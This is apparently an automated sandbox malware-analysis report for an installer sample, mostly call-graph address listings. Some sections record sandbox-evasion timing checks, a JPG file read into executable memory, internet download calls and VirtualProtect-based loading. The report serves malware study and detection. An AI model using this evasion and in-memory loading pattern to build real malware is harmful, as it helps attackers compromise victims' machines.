a1d86e 20460->20466 20461->20455 20467 a1d8d3 20462->20467 20463->20442 20465->20417 20499 a1ec41 20466->20499 20469 a14452 _free 66 API calls 20467->20469 20469->20443 20470->20450 20472 a1eeab 20471->20472 20498 a1ef94 20471->20498 20473 a1eebc 20472->20473 20474 a14452 _free 66 API calls 20472->20474 20475 a14452 _free 66 API calls 20473->20475 20478 a1eece 20473->20478 20474->20473 20475->20478 20476 a1eef2 20481 a1ef04 20476->20481 20482 a14452 _free 66 API calls 20476->20482 20477 a1eee0 20477->20476 20480 a14452 _free 66 API calls 20477->20480 20478->20477 20479 a14452 _free 66 API calls 20478->20479 20479->20477 20480->20476 20483 a1ef16 20481->20483 20484 a14452 _free 66 API calls 20481->20484 20482->20481 20485 a1ef28 20483->20485 20487 a14452 _free 66 API calls 20483->20487 20484->20483 20486 a1ef3a 20485->20486 20488 a14452 _free 66 API calls 20485->20488 20489 a1ef4c 20486->20489 20490 a14452 _free 66 API calls 20486->20490 20487->20485 20488->20486 20491 a1ef5e 20489->20491 20492 a14452 _free 66 API calls 20489->20492 20490->20489 20493 a1ef70 20491->20493 20495 a14452 _free 66 API calls 20491->20495 20492->20491 20494 a1ef82 20493->20494 20496 a14452 _free 66 API calls 20493->20496 20497 a14452 _free 66 API calls 20494->20497 20494->20498 20495->20493 20496->20494 20497->20498 20498->20454 20500 a1eca6 20499->20500 20501 a1ec4e 20499->20501 20500->20470 20502 a1ec5e 20501->20502 20503 a14452 _free 66 API calls 20501->20503 20504 a1ec70 20502->20504 20505 a14452 _free 66 API calls 20502->20505 20503->20502 20506 a1ec82 20504->20506 20507 a14452 _free 66 API calls 20504->20507 20505->20504 20508 a1ec94 20506->20508 20509 a14452 _free 66 API calls 20506->20509 20507->20506 20508->20500 20510 a14452 _free 66 API calls 20508->20510 20509->20508 20510->20500 20512 a1d8fc 20511->20512 20513 a1e85e 20511->20513 20512->20451 20514 a14452 _free 66 API calls 20513->20514 20515 a1e866 20514->20515 20516 a14452 _free 66 API calls 20515->20516 20517 a1e86e 20516->20517 20518 a14452 _free 66 API calls 20517->20518 20519 a1e876 20518->20519 20520 a14452 _free 66 API calls 20519->20520 20521 a1e87e 20520->20521 20522 a14452 _free 66 API calls 20521->20522 20523 a1e886 20522->20523 20524 a14452 _free 66 API calls 20523->20524 20525 a1e88e 20524->20525 20526 a14452 _free 66 API calls 20525->20526 20527 a1e895 20526->20527 20528 a14452 _free 66 API calls 20527->20528 20529 a1e89d 20528->20529 20530 a14452 _free 66 API calls 20529->20530 20531 a1e8a5 20530->20531 20532 a14452 _free 66 API calls 20531->20532 20533 a1e8ad 20532->20533 20534 a14452 _free 66 API calls 20533->20534 20535 a1e8b5 20534->20535 20536 a14452 _free 66 API calls 20535->20536 20537 a1e8bd 20536->20537 20538 a14452 _free 66 API calls 20537->20538 20539 a1e8c5 20538->20539 20540 a14452 _free 66 API calls 20539->20540 20541 a1e8cd 20540->20541 20542 a14452 _free 66 API calls 20541->20542 20543 a1e8d5 20542->20543 20544 a14452 _free 66 API calls 20543->20544 20545 a1e8dd 20544->20545 20546 a14452 _free 66 API calls 20545->20546 20547 a1e8e8 20546->20547 20548 a14452 _free 66 API calls 20547->20548 20549 a1e8f0 20548->20549 20550 a14452 _free 66 API calls 20549->20550 20551 a1e8f8 20550->20551 20552 a14452 _free 66 API calls 20551->20552 20553 a1e900 20552->20553 20554 a14452 _free 66 API calls 20553->20554 20555 a1e908 20554->20555 20556 a14452 _free 66 API calls 20555->20556 20557 a1e910 20556->20557 20558 a14452 _free 66 API calls 20557->20558 20559 a1e918 20558->20559 20560 a14452 _free 66 API calls 20559->20560 20561 a1e920 20560->20561 20562 a14452 _free 66 API calls 20561->20562 20563 a1e928 20562->20563 20564 a14452 _free 66 API calls 20563->20564 20565 a1e930 20564->20565 20566 a14452 _free 66 API calls 20565->20566 20567 a1e938 20566->20567 20568 a14452 _free 66 API calls 20567->20568 20569 a1e940 20568->20569 20570 a14452 _free 66 API calls 20569->20570 20571 a1e948 20570->20571 20572 a14452 _free 66 API calls 20571->20572 20573 a1e950 20572->20573 20574 a14452 _free 66 API calls 20573->20574 20575 a1e958 20574->20575 20576 a14452 _free 66 API calls 20575->20576 20577 a1e960 20576->20577 20578 a14452 _free 66 API calls 20577->20578 20579 a1e96e 20578->20579 20580 a14452 _free 66 API calls 20579->20580 20581 a1e979 20580->20581 20582 a14452 _free 66 API calls 20581->20582 20583 a1e984 20582->20583 20584 a14452 _free 66 API calls 20583->20584 20585 a1e98f 20584->20585 20586 a14452 _free 66 API calls 20585->20586 20587 a1e99a 20586->20587 20588 a14452 _free 66 API calls 20587->20588 20589 a1e9a5 20588->20589 20590 a14452 _free 66 API calls 20589->20590 20591 a1e9b0 20590->20591 20685->20426 20689 a1b6de LeaveCriticalSection 20686->20689 20688 a1d2c6 20688->20405 20689->20688 20691 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 20690->20691 20692 a25169 20691->20692 20693 a251b1 20692->20693 20694 a2518b 20692->20694 20704 a2142f 20692->20704 20695 a251b6 20693->20695 20696 a251dc 20693->20696 20705 a24806 20694->20705 20698 a1a95f __fptostr 66 API calls 20695->20698 20700 a1a95f __fptostr 66 API calls 20696->20700 20696->20704 20699 a251bb 20698->20699 20701 a1a90d __fptostr 11 API calls 20699->20701 20702 a251e9 20700->20702 20701->20704 20703 a1a90d __fptostr 11 API calls 20702->20703 20703->20704 20704->19596 20704->19599 20708 a24815 20705->20708 20712 a2483f 20705->20712 20707 a2481a 20710 a1a95f __fptostr 66 API calls 20707->20710 20708->20707 20708->20712 20709 a24854 20709->20704 20711 a2481f 20710->20711 20713 a1a90d __fptostr 11 API calls 20711->20713 20715 a24724 20712->20715 20714 a2482a 20713->20714 20714->20704 20716 a24739 20715->20716 20726 a2475b ___ascii_strnicmp 20715->20726 20717 a15b6b _LocaleUpdate::_LocaleUpdate 76 API calls 20716->20717 20718 a24744 20717->20718 20719 a2474b 20718->20719 20720 a24779 20718->20720 20721 a1a95f __fptostr 66 API calls 20719->20721 20722 a24783 20720->20722 20730 a247a4 20720->20730 20723 a24750 20721->20723 20725 a1a95f __fptostr 66 API calls 20722->20725 20724 a1a90d __fptostr 11 API calls 20723->20724 20724->20726 20727 a24788 20725->20727 20726->20709 20728 a1a90d __fptostr 11 API calls 20727->20728 20728->20726 20729 a21c9d 85 API calls __tolower_l 20729->20730 20730->20726 20730->20729 20732 a1a8f5 20731->20732 20733 a1a8bb __invoke_watson 10 API calls 20732->20733 20734 a1a90c 20733->20734 20735 a1a8e0 __fptostr 10 API calls 20734->20735 20736 a1a919 20735->20736 20736->19557 20738 a15187 LeaveCriticalSection 20737->20738 20739 a15168 20737->20739 20738->19608 20739->20738 20740 a1516f 20739->20740 20743 a1b6de LeaveCriticalSection 20740->20743 20742 a15184 20742->19608 20743->20742 20745 a150f6 20744->20745 20746 a15118 EnterCriticalSection 20744->20746 20745->20746 20747 a150fe 20745->20747 20748 a1510e 20746->20748 20749 a1b7b7 __lock 66 API calls 20747->20749 20750 a15895 20748->20750 20749->20748 20751 a158a6 20750->20751 20752 a158ba 20750->20752 20753 a1a95f __fptostr 66 API calls 20751->20753 20755 a158b6 20752->20755 20769 a151c2 20752->20769 20754 a158ab 20753->20754 20757 a1a90d __fptostr 11 API calls 20754->20757 20766 a1596e 20755->20766 20757->20755 20762 a158d4 20786 a1c687 20762->20786 20764 a158da 20764->20755 20765 a14452 _free 66 API calls 20764->20765 20765->20755 20767 a15157 _fgetc 2 API calls 20766->20767 20768 a15974 20767->20768 20768->19527 20770 a151db 20769->20770 20771 a151fd 20769->20771 20770->20771 20772 a1b0e3 __output_l 66 API calls 20770->20772 20775 a1c094 20771->20775 20773 a151f6 20772->20773 20774 a1bee7 __write 97 API calls 20773->20774 20774->20771 20776 a1c0a4 20775->20776 20778 a158ce 20775->20778 20777 a14452 _free 66 API calls 20776->20777 20776->20778 20777->20778 20779 a1b0e3 20778->20779 20780 a1b104 20779->20780 20781 a1b0ef 20779->20781 20780->20762 20782 a1a95f __fptostr 66 API calls 20781->20782 20783 a1b0f4 20782->20783 20784 a1a90d __fptostr 11 API calls 20783->20784 20785 a1b0ff 20784->20785 20785->20762 20787 a1c693 __wsopen_helper 20786->20787 20788 a1c6b6 20787->20788 20789 a1c69b 20787->20789 20791 a1c6c2 20788->20791 20794 a1c6fc 20788->20794 20790 a1a972 __commit 66 API calls 20789->20790 20792 a1c6a0 20790->20792 20793 a1a972 __commit 66 API calls 20791->20793 20795 a1a95f __fptostr 66 API calls 20792->20795 20796 a1c6c7 20793->20796 20797 a23e85 ___lock_fhandle 68 API calls 20794->20797 20807 a1c6a8 __wsopen_helper 20795->20807 20798 a1a95f __fptostr 66 API calls 20796->20798 20799 a1c702 20797->20799 20800 a1c6cf 20798->20800 20801 a1c710 20799->20801 20802 a1c71c 20799->20802 20803 a1a90d __fptostr 11 API calls 20800->20803 20804 a1c5eb __close_nolock 69 API calls 20801->20804 20805 a1a95f __fptostr 66 API calls 20802->20805 20803->20807 20806 a1c716 20804->20806 20805->20806 20809 a1c743 20806->20809 20807->20764 20812 a23f24 LeaveCriticalSection 20809->20812 20811 a1c749 20811->20807 20812->20811 20814 a17559 20813->20814 20815 a17549 20813->20815 20820 a1756b 20814->20820 20828 a218bb 20814->20828 20816 a1a95f __fptostr 66 API calls 20815->20816 20819 a1754e 20816->20819 20818 a151c2 __flush 97 API calls 20821 a17579 20818->20821 20825 a17635 20819->20825 20820->20818 20822 a1b0e3 __output_l 66 API calls 20821->20822 20823 a175ab 20822->20823 20845 a217e7 20823->20845 20826 a15157 _fgetc 2 API calls 20825->20826 20827 a1763d 20826->20827 20827->19540 20829 a218e6 20828->20829 20830 a218ce 20828->20830 20832 a1b0e3 __output_l 66 API calls 20829->20832 20831 a1a95f __fptostr 66 API calls 20830->20831 20833 a218d3 20831->20833 20834 a218ed 20832->20834 20835 a1a90d __fptostr 11 API calls 20833->20835 20836 a217e7 __write 71 API calls 20834->20836 20844 a218de 20835->20844 20837 a21904 20836->20837 20838 a21976 20837->20838 20840 a21936 20837->20840 20837->20844 20839 a1a95f __fptostr 66 API calls 20838->20839 20839->20844 20841 a217e7 __write 71 API calls 20840->20841 20840->20844 20842 a219d1 20841->20842 20843 a217e7 __write 71 API calls 20842->20843 20842->20844 20843->20844 20844->20820 20846 a217f3 __wsopen_helper 20845->20846 20847 a217fb 20846->20847 20850 a21816 20846->20850 20848 a1a972 __commit 66 API calls 20847->20848 20851 a21800 20848->20851 20849 a21822 20852 a1a972 __commit 66 API calls 20849->20852 20850->20849 20853 a2185c 20850->20853 20854 a1a95f __fptostr 66 API calls 20851->20854 20855 a21827 20852->20855 20856 a23e85 ___lock_fhandle 68 API calls 20853->20856 20863 a21808 __wsopen_helper 20854->20863 20857 a1a95f __fptostr 66 API calls 20855->20857 20859 a21862 20856->20859 20858 a2182f 20857->20858 20860 a1a90d __fptostr 11 API calls 20858->20860 20861 a21870 20859->20861 20862 a21884 20859->20862 20860->20863 20864 a21772 __lseek_nolock 68 API calls 20861->20864 20865 a1a95f __fptostr 66 API calls 20862->20865 20863->20819 20866 a2187c 20864->20866 20867 a21889 20865->20867 20870 a218b3 20866->20870 20868 a1a972 __commit 66 API calls 20867->20868 20868->20866 20873 a23f24 LeaveCriticalSection 20870->20873 20872 a218b9 20872->20863 20873->20872 20874 a12c49 20875 a12c57 20874->20875 20878 a12c6a Mailbox 20874->20878 20880 a12872 20875->20880 20877 a12c5c 20879 a15902 __fcloseall 102 API calls 20877->20879 20879->20878 20881 a1287c __EH_prolog 20880->20881 20883 a128a3 Mailbox 20881->20883 20887 a1252a 20881->20887 20883->20877 20884 a128c2 20884->20883 20893 a1566a 20884->20893 20906 a12420 20884->20906 20888 a12543 20887->20888 20889 a12539 20887->20889 20919 a12276 20888->20919 20912 a13877 20889->20912 20892 a1254b Mailbox 20892->20884 20894 a15676 __wsopen_helper 20893->20894 20895 a1569e __wsopen_helper 20894->20895 20896 a156a6 20894->20896 20897 a1568e 20894->20897 20895->20884 20898 a150e4 __lock_file 67 API calls 20896->20898 20899 a1a95f __fptostr 66 API calls 20897->20899 20900 a156ae 20898->20900 20901 a15693 20899->20901 21026 a15513 20900->21026 20903 a1a90d __fptostr 11 API calls 20901->20903 20903->20895 20907 a12440 20906->20907 20908 a12436 20906->20908 20910 a12276 Mailbox 77 API calls 20907->20910 20911 a12452 Mailbox 20907->20911 20909 a13877 std::_Xinvalid_argument 67 API calls 20908->20909 20909->20907 20910->20911 20911->20884 20925 a13c83 20912->20925 20916 a138a6 20931 a13d08 20916->20931 20920 a12282 20919->20920 20921 a1228c 20919->20921 20922 a13877 std::_Xinvalid_argument 67 API calls 20920->20922 20923 a1229c Mailbox 20921->20923 20959 a11d38 20921->20959 20922->20921 20923->20892 20934 a13c25 20925->20934 20928 a1450c 20929 a14541 RaiseException 20928->20929 20930 a14535 20928->20930 20929->20916 20930->20929 20949 a13caa 20931->20949 20935 a13891 20934->20935 20936 a13c33 _strlen 20934->20936 20935->20928 20937 a1729e _malloc 66 API calls 20936->20937 20938 a13c45 20937->20938 20938->20935 20940 a18381 20938->20940 20941 a18396 20940->20941 20942 a1838f 20940->20942 20943 a1a95f __fptostr 66 API calls 20941->20943 20942->20941 20946 a183b4 20942->20946 20944 a1839b 20943->20944 20945 a1a90d __fptostr 11 API calls 20944->20945 20947 a183a5 20945->20947 20946->20947 20948 a1a95f __fptostr 66 API calls 20946->20948 20947->20935 20948->20944 20950 a138b7 20949->20950 20951 a13cba 20949->20951 20950->20888 20955 a13c65 20951->20955 20954 a13c25 std::exception::_Copy_str 66 API calls 20954->20950 20956 a13c70 20955->20956 20957 a13c78 20955->20957 20958 a14452 _free 66 API calls 20956->20958 20957->20950 20957->20954 20958->20957 20960 a11d42 __EH_prolog 20959->20960 20963 a11367 20960->20963 20962 a11d96 Mailbox _memmove 20962->20923 20964 a11374 20963->20964 20965 a113ac 20963->20965 20968 a11382 20964->20968 20971 a1448c 20964->20971 20965->20962 20967 a13c83 std::exception::exception 66 API calls 20969 a11397 20967->20969 20968->20965 20968->20967 20970 a1450c __CxxThrowException@8 RaiseException 20969->20970 20970->20965 20974 a14496 20971->20974 20972 a1729e _malloc 66 API calls 20972->20974 20973 a144b0 20973->20968 20974->20972 20974->20973 20975 a1ac6e _malloc DecodePointer 20974->20975 20978 a144b2 std::exception::exception 20974->20978 20975->20974 20976 a144f0 20977 a13d08 std::bad_exception::bad_exception 66 API calls 20976->20977 20979 a144fa 20977->20979 20978->20976 20983 a165ba 20978->20983 20981 a1450c __CxxThrowException@8 RaiseException 20979->20981 20982 a1450b 20981->20982 20986 a1657e 20983->20986 20985 a165c7 20985->20976 20987 a1658a __wsopen_helper 20986->20987 20994 a1b395 20987->20994 20993 a165ab __wsopen_helper 20993->20985 20995 a1b7b7 __lock 66 API calls 20994->20995 20996 a1658f 20995->20996 20997 a16497 DecodePointer DecodePointer 20996->20997 20998 a164c5 20997->20998 20999 a16546 20997->20999 20998->20999 21011 a1df15 20998->21011 21008 a165b4 20999->21008 21001 a16529 EncodePointer EncodePointer 21001->20999 21002 a164fb 21002->20999 21005 a16449 __realloc_crt 70 API calls 21002->21005 21006 a16517 EncodePointer 21002->21006 21003 a164d7 21003->21001 21003->21002 21018 a16449 21003->21018 21007 a16511 21005->21007 21006->21001 21007->20999 21007->21006 21023 a1b39e 21008->21023 21012 a1df20 21011->21012 21013 a1df35 HeapSize 21011->21013 21014 a1a95f __fptostr 66 API calls 21012->21014 21013->21003 21015 a1df25 21014->21015 21016 a1a90d __fptostr 11 API calls 21015->21016 21017 a1df30 21016->21017 21017->21003 21022 a16452 21018->21022 21019 a1de68 __realloc_crt 69 API calls 21019->21022 21020 a16491 21020->21002 21021 a16472 Sleep 21021->21022 21022->21019 21022->21020 21022->21021 21024 a1b6de _doexit LeaveCriticalSection 21023->21024 21025 a165b9 21024->21025 21025->20993 21027 a15542 21026->21027 21029 a15525 21026->21029 21038 a156da 21027->21038 21028 a15532 21030 a1a95f __fptostr 66 API calls 21028->21030 21029->21027 21029->21028 21035 a1555c _memmove 21029->21035 21031 a15537 21030->21031 21032 a1a90d __fptostr 11 API calls 21031->21032 21032->21027 21034 a151c2 __flush 97 API calls 21034->21035 21035->21027 21035->21034 21036 a1b0e3 __output_l 66 API calls 21035->21036 21037 a1bee7 __write 97 API calls 21035->21037 21041 a1b109 21035->21041 21036->21035 21037->21035 21039 a15157 _fgetc 2 API calls 21038->21039 21040 a156e2 21039->21040 21040->20895 21042 a1b0e3 __output_l 66 API calls 21041->21042 21043 a1b119 21042->21043 21044 a1b124 21043->21044 21045 a1b13b 21043->21045 21047 a1a95f __fptostr 66 API calls 21044->21047 21046 a1b13f 21045->21046 21052 a1b14c __stbuf 21045->21052 21049 a1a95f __fptostr 66 API calls 21046->21049 21048 a1b129 21047->21048 21048->21035 21049->21048 21050 a1b23c 21053 a1bee7 __write 97 API calls 21050->21053 21051 a1b1bc 21054 a1b1d3 21051->21054 21057 a1b1f0 21051->21057 21052->21048 21056 a223d6 __stbuf 66 API calls 21052->21056 21058 a1b1a2 21052->21058 21061 a1b1ad 21052->21061 21053->21048 21055 a1bee7 __write 97 API calls 21054->21055 21055->21048 21056->21058 21057->21048 21065 a1c501 21057->21065 21058->21061 21062 a1b26d 21058->21062 21061->21050 21061->21051 21063 a163b8 __malloc_crt 66 API calls 21062->21063 21064 a1b282 21063->21064 21064->21061 21066 a1c50d __wsopen_helper 21065->21066 21067 a1c53a 21066->21067 21068 a1c51e 21066->21068 21069 a1c546 21067->21069 21074 a1c580 21067->21074 21070 a1a972 __commit 66 API calls 21068->21070 21071 a1a972 __commit 66 API calls 21069->21071 21072 a1c523 21070->21072 21073 a1c54b 21071->21073 21075 a1a95f __fptostr 66 API calls 21072->21075 21076 a1a95f __fptostr 66 API calls 21073->21076 21077 a23e85 ___lock_fhandle 68 API calls 21074->21077 21084 a1c52b __wsopen_helper 21075->21084 21078 a1c553 21076->21078 21079 a1c586 21077->21079 21080 a1a90d __fptostr 11 API calls 21078->21080 21081 a1c5b0 21079->21081 21082 a1c594 21079->21082 21080->21084 21083 a1a95f __fptostr 66 API calls 21081->21083 21085 a1c47c __lseeki64_nolock 68 API calls 21082->21085 21087 a1c5b5 21083->21087 21084->21048 21086 a1c5a5 21085->21086 21090 a1c5e1 21086->21090 21088 a1a972 __commit 66 API calls 21087->21088 21088->21086 21093 a23f24 LeaveCriticalSection 21090->21093 21092 a1c5e9 21092->21084 21093->21092 21940 3adfb37 21957 3ae1628 GetPEB 21940->21957 21942 3adfb57 21943 3ae1628 GetPEB 21942->21943 21944 3adfb6b 21943->21944 21945 3adfb84 VirtualAlloc 21944->21945 21956 3adfcc8 21944->21956 21946 3adfb9b 21945->21946 21945->21956 21947 3ae1628 GetPEB 21946->21947 21946->21956 21948 3adfc0d 21947->21948 21949 3adfc2b LoadLibraryA 21948->21949 21952 3adfc3b 21948->21952 21948->21956 21949->21949 21949->21952 21950 3ae1628 GetPEB 21950->21952 21951 3adfc77 21951->21956 21959 3adffe7 LoadLibraryA 21951->21959 21952->21950 21952->21951 21952->21956 21958 3ae163c 21957->21958 21958->21942 21960 3ae0004 21959->21960 21961 3adfcb5 21959->21961 21960->21961 21962 3ae002c VirtualProtect 21960->21962 21961->21956 21969 3ae00cd 21961->21969 21962->21961 21963 3ae0040 21962->21963 21964 3ae005a VirtualProtect 21963->21964 21965 3ae0076 21964->21965 21965->21961 21966 3ae008a VirtualProtect 21965->21966 21966->21961 21967 3ae009a 21966->21967 21968 3ae00af VirtualProtect 21967->21968 21968->21961 21971 3ae00de 21969->21971 21970 3ae00e4 21970->21956 21971->21970 21972 3ae0112 VirtualProtect 21971->21972 21972->21970 21973 3ae0126 21972->21973 21974 3ae0140 VirtualProtect 21973->21974 21975 3ae015c 21974->21975 21975->21970 21976 3ae0170 VirtualProtect 21975->21976 21976->21970 21977 3ae0180 21976->21977 21978 3ae0195 VirtualProtect 21977->21978 21978->21970
              APIs
              • __EH_prolog.LIBCMT ref: 00A125C5
                • Part of subcall function 00A1221A: __EH_prolog.LIBCMT ref: 00A1221F
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: H_prolog
              • String ID:
              • API String ID: 3519838083-0
              • Opcode ID: 45c6798c7112b0a8e436fecd480e63c52e286909c9319b22cb2ca61e2c633d2f
              • Instruction ID: 3b468d168e6e5c73b49dc1bda8c0959c1e64b435e4968d5e1e1d3979cc440628
              • Opcode Fuzzy Hash: 45c6798c7112b0a8e436fecd480e63c52e286909c9319b22cb2ca61e2c633d2f
              • Instruction Fuzzy Hash: 03113AB5900258EFCF11DF98CA90AEEBBB4FF18314F10805AE512AB251C775DA50DFA1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID: \VGm
              • API String ID: 0-1150679331
              • Opcode ID: 3d1db5c79f1da02858b24350ba446df9bc89479b863f239731be26988d429976
              • Instruction ID: 930a875dea04643f36858900390fecdad0bd41a98df23b182cbece935ee85415
              • Opcode Fuzzy Hash: 3d1db5c79f1da02858b24350ba446df9bc89479b863f239731be26988d429976
              • Instruction Fuzzy Hash: 8AB150B2E00209CFDF14CFA9D885BDDBBF2BF88314F148129D415AB254EB799845CB92
              Memory Dump Source
              • Source File: 00000000.00000002.3872627570.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5fa0000_998_popxinv_Installer.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86212b7564f96911dba6223ca0e0f5b20f3a5b05ebca4909e049bac57e0fb3c5
              • Instruction ID: 3ec28c19902e8aa12fb226671893a7661e9a1f8aa1d15a1b02658865a82333d2
              • Opcode Fuzzy Hash: 86212b7564f96911dba6223ca0e0f5b20f3a5b05ebca4909e049bac57e0fb3c5
              • Instruction Fuzzy Hash: EEB151B2E04209DFDF14CFA9C88579DBBF2BF88314F148529D815EB254EB799845CB82

              Control-flow Graph

              APIs
              • GetTickCount64.KERNEL32 ref: 00A111EF
              • Sleep.KERNEL32(0000012C), ref: 00A111F9
              • GetTickCount64.KERNEL32 ref: 00A111FF
                • Part of subcall function 00A14424: __vwprintf_l.LIBCMT ref: 00A14432
              • CreateFileA.KERNEL32(C:\Users\Public\Downloads\ind.jpg,80000000,00000001,00000000,00000004,00000080,00000000), ref: 00A11244
              • GetFileSize.KERNEL32(00000000,00000000), ref: 00A1124E
              • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 00A1125F
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00A11270
              • CloseHandle.KERNEL32(00000000), ref: 00A11277
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: File$Count64Tick$AllocCloseCreateHandleReadSizeSleepVirtual__vwprintf_l
              • String ID: C:\Users\Public\Downloads\ind.jpg$`3Wu01Wu$sandbox!!!$v4:%d
              • API String ID: 1694741105-1659962086
              • Opcode ID: 07fa94122a7c17fef0f4890fbccfd87ece8dcafe3acc794ad39291749788f331
              • Instruction ID: a0b994b4b60c0d6e871574878d7a71ef4049174eb2bbeb088f5430df9331ad4a
              • Opcode Fuzzy Hash: 07fa94122a7c17fef0f4890fbccfd87ece8dcafe3acc794ad39291749788f331
              • Instruction Fuzzy Hash: 281184736442187FE73097FD6C49FBB7A6CEB46B70F100535FA09E2190E6A45C0282B1

              Control-flow Graph

              APIs
              • __EH_prolog.LIBCMT ref: 00A12E5A
              • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00A12E76
              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00A12E93
              • InternetCloseHandle.WININET(?), ref: 00A12F27
                • Part of subcall function 00A12D2B: __EH_prolog.LIBCMT ref: 00A12D30
              • InternetReadFile.WININET(?,?,00001000,?), ref: 00A12EF9
              • InternetCloseHandle.WININET(?), ref: 00A12F0F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Internet$CloseH_prologHandleOpen$FileRead
              • String ID: Download
              • API String ID: 2208602198-2171396134
              • Opcode ID: cb676fdca3d862859dcb0b682ecb8861b24eb10db7ecb93c89f1e04de0cb227f
              • Instruction ID: abd45cbf9a0dd6eec0bcdb136f7bb9a311c923317e41cbac18852e05b609ba51
              • Opcode Fuzzy Hash: cb676fdca3d862859dcb0b682ecb8861b24eb10db7ecb93c89f1e04de0cb227f
              • Instruction Fuzzy Hash: EC21077190011AEFEF21DB94CD85FEEBB7DFB04754F100169B605A6190D6709EA5CB60

              Control-flow Graph

              APIs
              • __EH_prolog.LIBCMT ref: 00A12E5A
              • InternetOpenA.WININET(Download,00000001,00000000,00000000,00000000), ref: 00A12E76
              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 00A12E93
              • InternetCloseHandle.WININET(?), ref: 00A12F27
                • Part of subcall function 00A12D2B: __EH_prolog.LIBCMT ref: 00A12D30
              • InternetReadFile.WININET(?,?,00001000,?), ref: 00A12EF9
              • InternetCloseHandle.WININET(?), ref: 00A12F0F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.3869230113.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
              • Associated: 00000000.00000002.3869188726.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869251590.0000000000A29000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869267585.0000000000A2F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.3869284652.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_a10000_998_popxinv_Installer.jbxd
              Similarity
              • API ID: Internet$CloseH_prologHandleOpen$FileRead
              • String ID: Download
              • API String ID: 2208602198-2171396134
              • Opcode ID: a2607fa8f089cb6489c696fc18d0be702f105d4e7c031df364b2ffe33e4cb66c
              • Instruction ID: 7c993609a9ec5151114918579afce9d86d38ed6818001b5566f169e8b7a4f361
              • Opcode Fuzzy Hash: a2607fa8f089cb6489c696fc18d0be702f105d4e7c031df364b2ffe33e4cb66c
              • Instruction Fuzzy Hash: 21113A71900219EFEB20DB98DD85FEEBB79EB08754F104179B601A6190D6709EA6CB60

              Control-flow Graph

              APIs
              • LoadLibraryA.KERNEL32(?,00000000,00000002,?,03ADFCB5,00000000), ref: 03ADFFF5
              • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?,?,03ADFCB5,00000000), ref: 03AE0035
              • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 03AE0068
              • VirtualProtect.KERNEL32(00000000,004014A4,00000040,?), ref: 03AE0093
              • VirtualProtect.KERNEL32(00000000,004014A4,?,?), ref: 03AE00BD
              Memory Dump Source
              • Source File: 00000000.00000002.3870470602.0000000003AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_3ad0000_998_popxinv_Installer.jbxd
              Yara matches
              Similarity
              • API ID: ProtectVirtual$LibraryLoad
              • String ID:
              • API String ID: 895956442-0
              • Opcode ID: 37e3d411deaf8316fac3a5409ea6f1d30f4815463f8cd534134295cee1b328aa
              • Instruction ID: 06315c24d797558dbd2a564a21c407ac26f4a4656d52639e05c9e9033b198a68
